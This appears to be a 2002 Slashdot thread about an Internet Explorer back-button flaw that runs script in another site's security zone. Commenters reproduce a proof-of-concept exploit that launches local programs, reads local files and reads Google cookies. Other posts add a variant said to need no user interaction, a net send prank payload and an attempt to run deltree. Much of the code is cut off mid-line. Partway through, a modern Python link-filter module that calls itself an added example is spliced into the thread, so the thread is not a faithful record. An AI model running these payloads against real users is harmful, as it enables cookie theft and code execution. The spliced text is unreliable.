Don't Hit That Back Button
Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."
With every passing week, MS gives us more and more reasons not to use their POS browser. Whereas Mozilla is quickly becoming the undisputed king; tabbed browsing, filtering popups, better security options, and .. oh yeah, it's open source.
;-)
Take that, Microsoft.
Don't hit that 'REPLY' button. It may post a goatse link!!!
...
Sheesh, what really needs to be said here? Internet Explorer is full of more bugs than a $19.95 roadside motel. I can't wait for the explanation for this one out of Monopolis (AKA Redmond, WA).
-- We live in a world where lemonade is artificial and soap has real lemon.
Attack of the Back Button -- "Getting stuck on a web page can be painful. The back button doesn't always work. While there are many ways to escape from web pages, many users don't know the tricks. A company can stop hurting users by doing more testing, using proper development methods, and being aware of the issue."
How to Download YouTube Videos
I wanted to go back and vote on the poll!
Someone pick "insurance companies" for me.
Unless you can't go back either.
Hmmm....
Interestingly enough, McAfee caught it and labelled it a .vir right after I double-clicked on the test html....
Posted to MS in November and it still happens... I would think that this would be a top priority to get fixed, only because it can be used in bad ways.
Using open source software is harmful as well, pressing any button is likely to cause it to segfault
But it shows a definite flaw in the design of the browser. The source of the HTML has some interesting stuff in it as well...though I am surprised that this applies to all versions of IE. I suppose this comes down to IE executing scripts outside of the sandbox huh? Pretty simple to fix, disable all javascript.
Please note that I'm not responsible if that breaks websites.
Om, nomnomnom...
So it may not matter.
http://arizona.diamondbacks.mlb.com crashes both IE6 and IE5.
I don't know why. Could be the address it crashes at has a hardware problem on my machine. But why is java poking around my hardware?
Java is insecure, Windows is insecure, the Internet is insecure, and everyone using them has always known that.
--Blair
I don't have anything special in my Google cookies and I like to play minesweeper.
... but the damn lameness filter got me. I can't even whore for karma - i'm too lame. gutted.
IE has had so many security issues it's not even funny, yet it remains the most used browser on the internet.
What would be really nifty is if somebody started tracking the bugs in IE, and when they are reported. I bet you could start to predict the next one by using incidents, lines of code, and release number.
I predict there will be a new one right about
Now.
"Do or do not, there is no try." -Yoda
*Pause*
*DEEP BREATH!*
*SIGH!*
And people wonder why the hell I turn off Java and Javascript....
And it will until the dubious day that M$ gets its "shiznatz" straight.
But NOOO! It's SO much "cooler" to have a bunch of javascript crap in your page just to make it that much harder to browse!
Security my 3X wide, high-arched, hairy-toed, bunioned FOOT!
Chas - The one, the only.
THANK GOD!!!
Would a vulnerability still exist if a user wrote a page that redirected the browser to some page with malicious code in the target, and then, with a little bit of javascript set the location to javascript:history.back() (i.e. on mouse movement or whatever). Would this cause the javascript to run under the improper security settings, or does the user actually have to hit the "back" button?
The worst thing about the Bug is that "Exploit has only been tested on fully patched IE 6.0, with Win XP and Win2000 pro" I can't wait to automatically install Gator when I accidentally click a popunder advertisement and try to back out of it. I guess I should update my IE 6.0 ... Oh wait that doesn't work.....
if common sense was common, wouldn't everyone have it?
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/sys
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>
(As the author of this reply submits it via IE. Ah, the irony :-)
There's no point in being grown up if you can't be childish sometimes. -- Dr. Who
If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole. SP3 for IE6 patches it up fine though. That's right, when you mouseover the back button, a popup text alerts you that it might be dangerous (that M$ can't be held responsible for damages resulting from its use?). Also, the "Safe Back Button" is now next to it, but to get it out the door in time, they've had to rush. Yes folks, it uses the exact same codebase as the back button, and no, I don't see that as a problem. Besides, if it is, they'll fix it with SP4, and the "Really Safe Back Button". Right along side the other two, for backward compatibility.
Doesn't this violate the GPL?
I still can't figure out why people are using IE, seriously. I use opera, and it is so much more stable it isn't funny. The speed and resources used are much better. I love mouse gestures, and I've removed the whole back button panel, I just hold the right mouse down and click the left, to go forward, hold the left and click right.
The only complaint is that some improper css and js screw with it. It's far better than dealing with IE bugs, especially if people were to start using opera, then webpages would be tested with it.
I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.
This is a very troubling security hole for Windows users who prefer IE (99.7% of them).
Founder, monolinux
If you celebrate Xmas, befriend me (538
Back in 1999, when the dot-coms were flying high and my company resembled an Internet startup (although we had been in business since 1992), we hastily set up new offices and cubicles with little regard for information security. After all, what was the worst that could happen - an email worm? Well, we quickly found out: a malicious hacker had targeted our company, and sent an email to "all @" my domain containing a link to a supposed Yahoo News story. Unfortunately, this link sent the employees to a malicious site that caused their insecure IE browsers to yield control of nearly every Windows PC in the company to the intruder. They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.
A few weeks after the incident, our vice president of operations mandated a Mozilla-only policy. Employees were forbidden from running IE, Lynx (another notoriously insecure browser), and Konqueror (which crashed constantly anyway). Since that time, we have had zero browser related security issues, and employees waste far less time surfing the web, mainly because a lot of time-wasting sites only work in Microsoft standards-compliant browsers. Converting to Mozilla has been a win-win situation, and I fully expect the same to be happening across America after this latest IE security breach. Enough is enough; we need to take back control of our networks.
"Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."
That's a pretty long time (5-6 months, too lazy to figure out the actual number of days etc.) that Microsoft has done nothing (at least not a fix). Especially because this overlaps the time when they decided to make their people go to security workshops (or some such). If they can't even fix a known, reported bug in the security how can they find them on their own and fix them? Or not write them in the future?
Oh yeah, it'd be nice to know if I can get around this by doing "right-click" / "back" or if that is affected and not JUST the toolbar.
No sig for you.
Are the problems with MS and the fast approaching 1.0 release of Mozilla signs that IE is fading? Let us postulate yes for a second. IF we do, then might we consider that the decline of IE is a sign that MS and most of its applications are going to slowly wither as faster better and cheaper alternatives become available? (despite the fact that engineers say faster better cheaper pick any two). Assuming that IE is foreshadowing the decline of many MS apps and OSs in the future, what will replace them? MS makes some useful, albeit very buggy software (Office). It is a shame there is no better standard for computer users. Can MS shift its business focus to software exclusively? or perhaps to the OS market exclusively and dump Office and the rest under Open-Source. I think these are interesting possibilities to explore.
the back button doesn't work as expected. I end up opening every link in a new window, closing windows becomes my back button. Is it really hard to make the back button have *exactly* this behavior? (hint, if pressing the back button reloads the page, you have failed.) Looks like programmers avoid doing the simplest thing because bloat is expected these days.
This doesn't exactly strengthen the arguments of those who believe that IE is the best browser (cough, cough, such as yours truly), that's for sure.
This little incident explains in detail why I've slowly stripped as much Microsoft software from my system as possible. Unlike many on /. I don't have an innate bias against Microsoft and don't mind using their software if it gets the job done but if even using the back button on my browser can someone fsck me up, well, it's time to consider some radical alternatives. Linux and a browser should run pretty sweet on a 1GHz AMD...
You want to know who isn't running Firefox 2.x? They spell it "definately" and "rediculous".
> and a forced bug fix for everybody on XP?
WTF are you talking about? Do you even use XP? There are no "forced" fixes that I've seen. (Unless you're an idiot, and you specifically told XP to automatically download and install all fixes.) XP does _NOT_ force fixes on me. Simply put, whenever a new update is available, a little tiny globe pops up by my clock and says "Hey, there's a new update."
I can click on it if I want, it doesn't take control of my mouse. It doesn't force me to click on it.
Once I _DO_ click on it, it simply states:
"There is such and such a fix, as per this KB article. Click [here] to read on the fix. Click [install] to install, [remind me later] to remind me later, or [go the fuck away] to have this go away."
Quzah.
" 'Using the Back Button in IE is dangerous'." - since when was using anything in IE safe? ;o)
Video Game cheats, hints a
Other than just clicking on the MS link, is there a site devoted just to the fuckups of MS? From calling the GPL cancer to dumb ass bugs like this, I would love a good site so that every time I see a post on shacknews that says "People just hate MS because everyone hates them, Windows 98 was fine and worked great for me"
The ultimate network admin tool needs HELP!
Bench the latest Mozilla build (turn off debugging and turn on optimization, just like a normal release build) and post that again. Of course, to really shine, run it on Linux or a free BSD.
Seriously, it's fast and its implementation of little things like CSS (which as far as I'm concerned is the future of online content) is light years ahead of IE anyways.
Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version. That's right, the MS-IE-Mac-port team did it so much better that they backported it to Windows. That's where the speed and decent standards support came from!
I think that this goes to show that Microsoft doesn't re-write something from scratch on purpose. They had to force their Mac team to basically do so (because, like, it's IE not on Windows, you have to redo a bunch of stuff) before they figured out that they needed to reimplement. The sad thing is that they don't seem to be willing to do it where it counts, no matter how "security focused they become" they don't ever figure out that it's impossible to effectively rewrite Windows "a piece at a time".
I think Mauve has the most RAM. --PHB (Dilbert Comic)
I copied the HTML onto my webserver deliberately, and tried it out -- the exploit worked as expected EXCEPT when my virus scanner was on. Then I couldn't even save the web page when I copied the text to it. So a virus scanner prevents an IE bug? Weird.
At first I thought wuh? But of course I was in Mozilla, so I didn't see the problem. IE executed its exploit right away.
Free Software ought to get better press from this, as it underscores a major truism.
In Free Software, new versions are generally made and released due to added functionality or fixed bugs. Anything else is a waste of time for the programmers, right?
With the exception of a very huge vulnerability that was finally fixed with IE SP2 (though who knows what else that contained), new software versions from Microsoft seem due to an entirely different set of reasons, like:
- breaking more fledgling standards
- making news
- embracing/extending
- press releases
- etc
Yea, they were only notified Nov. 21, 2001 and then notified again with more info Mar. 25, 2002. They had no clue..
In Microsoftese, this is called "innovation".
Of course, can you name one feature of IE that isn't dangerous? Well, other than clicking File/Close
mmm... yeah... You see, we're putting the cover sheets on all TPS reports now before they go out...
Mozilla 1.0 RC1 release possible tomorrow.
Can you invoke this by using history.go(-1); ?
http://diesel.2y.net/mine.htm
my McAfee VirusScan already checks for this bug.
THERE IS NO DATA. THERE IS O
Don't be silly. Opera is king, and always will be. www.fudo.org in the phorums for in depth conversations on this. Mozilla = Sex with Porcupine Opera - Sex with MILF. Need I say more?
If you read the exploit, you would see why this would not be possible.
You do not need to actually press the button, but you need to do it from a trusted page.
I'm a conscientious
n/t = nice troll
Microsoft seems to really be taking it in the shorts of late -- you can't help but feel a little sympathy watching the pathetic Benny-Hill skit that is their attempt at "trustworthy computing". Feels like the blonde's lost her dress and an angry mob is chasing Gates through the streets of London in double-time. Even hindsight makes it seem that much more pathetic.
What the hell... YUP. Hey, you're formatting my hard drive! Bastard! :)
(IE6 + XP [Un]Professional)
This is one of the most beautiful bugs I've ever seen - Microsoft is clearly an innovator in bringing ever-more-advanced, aesthetically-pleasing bugs to customers.
Seriously though... there is a true elegance to this vulnerability that one rarely sees in the usual passel of buffer overflows, etc.
This bug combines a canonical and visceral piece of browser functionality (back-button) with a conceptually and technically advanced, as well as invisibly-controlled piece of browser functionality (site-specific browser security settings). What wonderful juxtaposition!
C'mon! At least this is far better than the usual "ironic" bugs that come up (i.e. default passwords in a security program - har-de-har-snore).
When I spent hours in labs browsing with Netscape 2.0...
When a webpage wasn't something you had to figure out how to escape...
When 'Back' meant back...
When there was just smooth uninterrupted navigation, and no pop-ups or banners...
When people could say pretty much say anything anywhere, no DMCA...
... remember that?
The coolest voice ever.
Would it be possible for a malicious page to load a trusted page in another frame, pause for it to load, then execute a back() in that frame? There are loads of things that javascript isn't allowed to do in a frame from another website, but is back() among them?
If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven by the needs of the marketing group.
You find a hole, you do due diligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.
It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.
But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Don't say the word "minesweeper!"
Must...not...play...addictive...game...any...more...
I had the habit kicked and then you went and threw me into a relapse. Shite. Oh well, here goes another 30 wasted minutes of my time...
+1 Insightful, -1 Troll. What can I say, I'm an Insightful Troll.
And this poped up. Was I hacked?
What is pirate software? Software for inventory of stolen treasure?
I tried to reply to say "At least slashdot doesn't have any bugs in it", but the reply button wasn't working...
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
You can trace the decline the the use of the name 'longhorn' to the decline.
Never, never, never use a slaughter animal as a product codename.
What happened, did someone trip over the power cord to the database server or something? (slashdot was down again)
in IE 5.1 for OSX 10.1.3 it simply does not allow you to go back. wow microsofty makes better shit for the mac than the pee cee!
I want 2D games back.
For those not aware of his problem, here's a synopsis. Mozilla will parse a URL of the form "data:content/type;encoding,rawdata and treat it as a file of the type given. For example, the URL "data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">" will create an HTML page that will immediately shunt you to google.com. Open up Mozilla and paste that URL in if you don't believe me. Using an encoding type of "base64", images, data files and even executables can be hidden inside a URL. Trolls have already exploited this numerous times for mundane things like embedding goatse.cx links; imagine if some malicious hacker were to design a page with a trojan .exe or shellscript embedded in an innocuous-looking URL!
While "data:" URLs can be filtered out with Proxomitron or avoided by careful scanning of the status bar before clicking any link, I think such a glaringly wide target for abuse doesn't belong in any project past the alpha-test stage, much less one that is getting ready to make a highly-publicised 1.0 release in the upcoming weeks. Until this hole is patched, I would recommend Konqueror to you. It no longer "crash[es] constantly anyway", as you put it; the 3.0 release is incredibly stable, supports made-for-IE sites much better than Moz, and also has more than adequate standards support. I would suggest rethinking your Mozilla deployment strategy and giving Konq another go.
Loneliness is a power that we possess to give or take away forever
My virus scanner (McAfee VirusScan for NT with all the latest patterns) picked this up as the "exploit-codebase" virus.
:) Maybe it's just telling me the browser is a virus :P
Wonderful isn't it when an anti virus product picks up a bug in your browser?
I mean, we've rebooted Windows countless times. Windows 2000 and XP come in and the number of reboots has dropped significantly. I'm sure many customers reported this problem to Microsoft, so they inserted a security bug so that the safest way to go back is to start the browser again. I'm sure disgruntled customers will be happy to see the old times again :)
I am soooo much better then all of u sKripT kiddies.
I bet none of uz can haxor me!
www.megarad.com
How can M$ have armies of engineers working an entire month on security and not fix a serious known bug? How is it freaking "trustworthy computing" when you know about a bug for six months and not fix it! I think this proves that the month long security blitz was just a load of marketing crap.
I guess I can feel 'least a little smug by the fact that almost from the start I've opened links in new windows.
cheers
Rock and roll. I set a new record. I haven't played minesweeper since... win98SR1!
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
I found the same bug in Mozilla last summer while I was working at Netscape. My boss fixed it within a week, so versions after Mozilla 0.9.3 did not have the bug. It was bug 88167 if you're interested. I'm not sure why I didn't notice that IE was vulnerable as well. Anyone want to go through old Mozilla security holes and see how many of them affect IE 6?
Anyway, keep using that Back button. If you're using IE to browse warez/porn, you have more to worry about than someone looking at your cookie for another site. An attacker could just copy the IE exploit of the week from
http://jscript.dk/unpatched/. I believe that page has had current IE security holes that allow running arbitrary instructions for two months straight. (That means you can keep up with the latest IE patches, but if an attacker reads jscript.dk and can get you to click a link in AIM or read a message in OE, the attacker wins.)
By the way, what's with IE turning every cross-domain hole into a full remote compromise by letting sites link to res: urls? Current versions of Mozilla block links to chrome/res and even file, so a cross-domain hole doesn't even let sites read local files.
The shareholder is always right.
Open Source is the Way
1)Bundled....people are sheep.
2)Bundled.....a lot of people don't have the band or the patience to do a lot of downloading (AOL users on dialup)
3)Bundled...on a corporate win2k desktop where the user just logs in and can't really install much in the way of software...see 1) s/pc support personal/people
I don't really think so.
Up until recently (i.e. Moz and Opera maturing into decent browsers) IE was the best game in town, it was just an added bonus that it came bundled.
Netscape 4.x has been a joke since IE's renderer got good (around 4.5, I'd say), and Netscape 6.0 release bugs scared a lot of people off.
Most people have never even heard of Opera.
However, if the new browsers keep improving, and IE holes keep appearing with this kind of severity, I can see people downloading other browsers, just like they used to.
But really, until late last year, IE, in all its mediocrity, was still the best for most people's browsing.
It's reasonably stable, reasonably fast and renders pages reasonably well.
There was no incentive to switch to something either obsolete (old Netscape), slow (new Netscape), buggy (Mozilla), or pretty much unknown (Opera).
There might be now.
C-X C-S
i just clicked the back button on the preview window.. really..
The war with islam is a war on the beast
The war on terror is a war for peace
Read, people... Read, then make comments. It's not that difficult.
You can leave javascript enabled, and you can still go back without triggering the attack script if you do the following:
The itty-bitty down-arrow to the right of the back button opens a brief session history. Select the second entry from the top, and you are 'back'. The script is not triggered. This also works great on annoying pages that don't let you go back. Note: you would normally select the top entry to go back one page, but not with this exploit, so I guess just watch for the error page and remember to hit the second one down.
Train yourself to do this and you're ok. You'll even find that you actually *use* the feature to skip back multiple pages rather than clicking several 'backs' in a row...
The scary part is that most people won't be aware of this. I've been trying (unsuccessfully) to get it to run deltree to see if that would work, but the command needs backslashes in the path argument, and of course they're being stripped out. Nothing I've tried has worked, and I'm hoping that it's just impossible.
whenever "accidentally" browsing to a porn site...sitting there calmly results in a couple of pop-ups and the goodies I mean offensive material presented to you.
hit that back button, and WHAM!!!!!! A million pop-ups and flurry of pages, plus they make your default page their home page, and all sorts of crap....
i've learned that the back button is a no-no.
"Alt-F4"
you can nuke windows faster than they can pop-up with that sucker.
;-)
Whoops, copied winmine to the system32 folder, now it works. Going to stick with mozilla for a while.
Here is a way to disable this nasty bug. It should work in all affected versions of IE:
1. Right click the toolbar, and select "Customize"
2. Select "Back" in the list marked "Current toolbar buttons"
3. Click the "Remove" button.
4. Click close.
There! Now that bug has been squashed. I suggest you implement this in all corporate deployments of IE pronto.
the more i love my mac. none of this did a bloody thing on osx / ie 5.1.4
maybe it's the fix we got today, though
"Win treats sysadmins better than users. Mac treats users better than sysadmins. Linux treats everyone like sysadmins."
'Using the Back Button in IE is dangerous'.
That was supposed to be 'Using IE is dangerous'.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
mozilla can't even render the encarta.com site correctly
This site lists dozens of IE holes, 13 of which still are open!
13 remote compromises in a web browser!?!?! Good to see that Microsoft's one month 'security' jihad went so well.
Even if an executable were encoded in the link would the end user not be simply warned that they are attempting to download an executable, as with any other URL that served them an executable?
It's only a security hole if delivering the content via the data URL is treated differently than getting it via an http, ftp or javascript one.
Boffoonery - downloadable Comedy Benefit for Bletchley Park
.. do a little something like this:
<a href="javascript:execFile('file:///c:/winnt/syste
m 32/net send * \"HI EVERYBODY IN THE OFFICE! I AM LOOKING AT PORN!\"')">CLICK FOR BOOBIES</a>
I want Mozilla to give me the netscape finger.
Mozilla gives you the system finger cursor-shape when you :hover over a link. If you want Mozilla to give you the Netscape finger, or even the middle finger, you can select any .cur file in Start > Settings > Control Panel > Mouse > Pointers.
Will I retire or break 10K?
Good thing security is MicroSoft's number one focus now!
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
Step One: Move the mouse pointer to the toolbar containing the forward and back buttons. Point to any part of the toolbar EXCEPT either the forward or back buttons. Empty areas or other buttons are fine.
Step Two: Use the mouse button you have configured to bring up the context menus. On most systems this will be the right mouse button and is often referred to as "Right Clicking".
Step Three: From the context menu select the option CUSTOMIZE...
Step Four: In the Customize Toolbar window will be two boxes full of items. Use the scrollbar to browse the contents of the right-most box and look for the button that says "BACK". Highlight the "BACK" button item.
Step Five: FNORD
Step Six: Press the REMOVE button between the left and right item boxes.
Step Seven: Press the upper right most button marked "CLOSE".
Your browser should now be immune to this exploit. Share and Enjoy.
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
First off, had you bothered to do any research, RFC 2397 defines the data: URL scheme--this isn't some Mozilla debug thing, as you foolishly asserted. Second, you haven't actually demonstrated how this behaves differently from a normal URL. If you click http://this.is.a.url/ and the document at the end has a meta refresh to goatse.cx, how is that different from a data: URL (other than the data:URL being easier to spot)? Same deal with a shell script or .exe; it won't autorun any more than if you clicked on a link and got in through HTTP.
I'm not sure whether you actually believe you've found a vulnerability, or are just trolling for Konqueror; either way, it illustrates the weakness of /. moderation in succumbing to a good line of BS.
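As an added example for the data: URL argument above and the earlier point about browsers refusing links to res:/chrome:/file: targets (this is not code from the thread, from Mozilla or from Proxomitron), here is a small link filter of the kind a filtering proxy would run: it decodes data: URLs per RFC 2397 and applies a scheme allow list, so that javascript:, res: and file: hrefs, and data: URLs carrying HTML or executables, are refused before a browser sees them. The allow list, the risky media types and the sample hrefs are assumptions made for illustration.

```python
"""Link-scheme filter with an RFC 2397 data: URL decoder.

Added example, not code from the original thread, Mozilla or Proxomitron.
ALLOWED_SCHEMES and RISKY_MEDIA_TYPES are assumed policy values.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import unquote_to_bytes

# Schemes a filtering proxy hands through as link targets (assumed policy).
# Everything else, including javascript:, vbscript:, res:, chrome: and file:, is refused.
ALLOWED_SCHEMES = {"http", "https", "ftp", "mailto", "data"}

# data: media types that could deliver a live document or an executable (assumed policy).
RISKY_MEDIA_TYPES = {
    "text/html",
    "application/octet-stream",
    "application/x-msdownload",
    "application/x-sh",
}

_SCHEME_RE = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")


@dataclass
class DataUrl:
    media_type: str
    params: dict = field(default_factory=dict)
    is_base64: bool = False
    payload: bytes = b""


def scheme_of(url: str) -> str:
    """Lower-cased scheme, or '' for a relative reference.

    Browsers drop leading C0 controls/spaces and embedded tab/CR/LF before
    parsing, so the filter does the same or "java\\tscript:" slips past it.
    """
    cleaned = re.sub(r"^[\x00-\x20]+", "", url)
    cleaned = re.sub(r"[\t\r\n]", "", cleaned)
    m = _SCHEME_RE.match(cleaned)
    return m.group(1).lower() if m else ""


def parse_data_url(url: str) -> Optional[DataUrl]:
    """Decode data:[<mediatype>][;base64],<data> per RFC 2397; None if malformed."""
    if scheme_of(url) != "data":
        return None
    header, sep, data = url.split(":", 1)[1].partition(",")
    if not sep:
        return None  # the comma separator is mandatory
    parts = [p.strip() for p in header.split(";")] if header else []
    is_base64 = bool(parts) and parts[-1].lower() == "base64"
    if is_base64:
        parts.pop()
    media_type = parts[0].lower() if parts and parts[0] else "text/plain"
    params = {}
    for p in parts[1:]:
        key, eq, value = p.partition("=")
        if eq:  # bare tokens such as ";identity" carry no value and are ignored
            params[key.strip().lower()] = value.strip()
    if media_type == "text/plain":
        params.setdefault("charset", "US-ASCII")  # RFC 2397 default
    raw = unquote_to_bytes(data)  # percent-decoding applies in both encodings
    if is_base64:
        try:
            raw = base64.b64decode(raw + b"=" * (-len(raw) % 4))
        except ValueError:
            return None
    return DataUrl(media_type, params, is_base64, raw)


def classify_link(href: str) -> str:
    """Return 'allow', 'block:<scheme>' or 'block:data:<reason>' for one href."""
    scheme = scheme_of(href)
    if scheme == "":
        return "allow"  # relative reference, stays on the current origin
    if scheme not in ALLOWED_SCHEMES:
        return f"block:{scheme}"
    if scheme != "data":
        return "allow"
    parsed = parse_data_url(href)
    if parsed is None:
        return "block:data:malformed"
    if parsed.media_type in RISKY_MEDIA_TYPES:
        return f"block:data:{parsed.media_type}"
    return "allow"


if __name__ == "__main__":
    # Constructed sample hrefs; the data: URL is the one quoted in the thread.
    for href in (
        "http://www.google.com/",
        "javascript:history.back()",
        "file:///c:/test.txt",
        'data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">',
        "data:image/png;base64,iVBORw0KGgo=",
    ):
        print(f"{classify_link(href):35} {href[:60]}")
```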
It's amazingly EASY to grab someone's cookie information with this technique.
To protect yourself and your users don't store anything in cookies. Or wait until 99.9% of the population has an IE version larger than 6. ( which might be forever )
Your site is protected if you use sessions though.
Even if the session ID is saved on the visitors computer. All that would be shown are the last two session IDs.
Free Web based FTP
Here at uni, all the win2000 machines (too lazy to walk to the cs building) run McAfee Virus Scan.
When I tried to save the exploit code from the bugtraq archive, it pops up to tell me the file is infected with 'Exploit-CodeBase'. Fair enough, I thought, McAfee is certainly on the ball today, getting an update out so quickly.
On further inspection, however, the virus definition file was updated on the 10th of April! According to the bugtraq message, it was only made public on the 14th. I'm not sure, but isn't only the vendor involved given advance warning about exploits? How on earth did Network Associates know?
I think you're referring to ECMAScript, formerly called JavaScript.
First it was LiveScript, then when "Java" became a buzzword, Netscape changed its syntax to resemble that of a brace language (C, Perl, or the Java programming language) and changed its name to JavaScript. "ECMAScript" is the generic name, created when the underlying language (without any specific DOM) was submitted to the European standards body ECMA; "JavaScript" is Sun's trademark licensed to Netscape, reflected in the media type for ECMAScript source code (text/javascript).
Will I retire or break 10K?
to not use javascript. That is the first thing I disable in any browser I use, with activex/java being the second.
Really, it's so much more secure without all that crap active that I don't know why any halfway security-conscious person would do anything else.
Maybe the "Act" they performed was mostly theatrical.
Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.
Friends don't let friends enable ecmascript.
/. would not let me browse at 0 or -1, and would not let me reply to a post. What happened?
Microsoft - Where would you like to go today, Maybe Jail?
I'm not sure about the other (commercial or open source) browsers. However, I use a Mac OS X Cocoa browser called Omniweb [http://www.omnigroup.com/products/omniweb/]. It has a feature where the user can stop loading individual parts of a page. For instance, say you're loading a page with 60 images. Normally, you'd click the stop or back button in a browser. In Omniweb, the text would still load - but you could stop loading some of the larger images.
If you go to a form, say an Amazon purchase site or something where you have to pay....
then after that, say the moment after hitting 'purchase' or 'submit', you decide "oh goodie, let's save the page to disc", Mozilla will 're-send' the request, thereby making a double purchase.
Now that is lame. Surely the webpage is in its internal cache, so why can't it just save that without doing any NETWORK 'submits' or requests?
tsk tsk
pretty soon when vulnerabilities like this come out, we can say 'don't worry... you're an AOL user'. ;)
did i just see a pig fly by my window?
The exploit also works in IE5.5.
"Rating: Medium because user interaction is needed"?! What's the chance that the user will hit the back button when they think it will take them back to a porn image gallery, 80%?
The shareholder is always right.
... or is that because i'm using opera?
-D
This type of bug shouldn't really be a problem for anyone running a virus checker that's worth its beans. Just keep it set to check javascript and it should shout at you any time something like this tries to bite you.
I'm sure that Micro$oft's legions of monkeys hammering away at keyboards will eventually hit the right combination of keys to fix the problem.
If they notice or not is a whole other issue. ;-)
Damn it! I went to the test page and tried all the links with the back button. Not one of them worked. Not a one. There is a bug in the bug when it comes to Mac OS X and Internet Explorer. Once again as a Mac user, I am getting deprived of the same experience that Windows users get with Internet Explorer.
Strange women lying in ponds distributing swords is no basis for a system of government.
This latest version - version 5.1.4 - resolves all potential security vulnerabilities in previous versions of Internet Explorer 5. This includes vulnerabilities that might have caused Internet Explorer to stop responding or caused a memory problem that compromised the security of the computer.
However, I rechecked the back button bug that Mac OS X users experience where minesweeper will not launch on the test pages. Mac OS X IE v5.1.4 does not resolve the user experience issue for Mac users.
Yes,I saw the joke. I liked it too. I just used your post to vent something that's been bugging me for a long time. Your post was the minor imperfection on the beer glass of the world which allowed the seed of my thought to find purchase and rise to the surface as a big festering bubble of disgust. How very Zen. I think I'll go write Haiku...
Seriously, though, I once had to spend a week testing alternate browsers so that I could develop a test plan to replace IE on the machine in our NOC (after one of them got rooted when an operator was browsing warez and pr0n sites). I'm bitter about IE. And I had a nasty day at work (wrestling with CorporateTime's horrible attempt at an API, if you must know) so I had to vent. And for that I must thank you. I feel much better without all that painful gas pressure.
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The flaw can be exploited *without* user interaction: use about: and use a body-onload javascript to execute the back button. PoC HTML page is attached. u know what this means :P .
----cut here---
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)
Read c:\test.txt (needs to be created)
Read Google cookie
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "about: ";
function execFile(file){
alert (badUrl);
s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}
---cut here---
If you don't install windows onto the c drive(or at all), then you're all good. If it's coded, then the coder must assume things about the targets. You start assigning arbitrary drive letters, that will surely mess with something.
-D
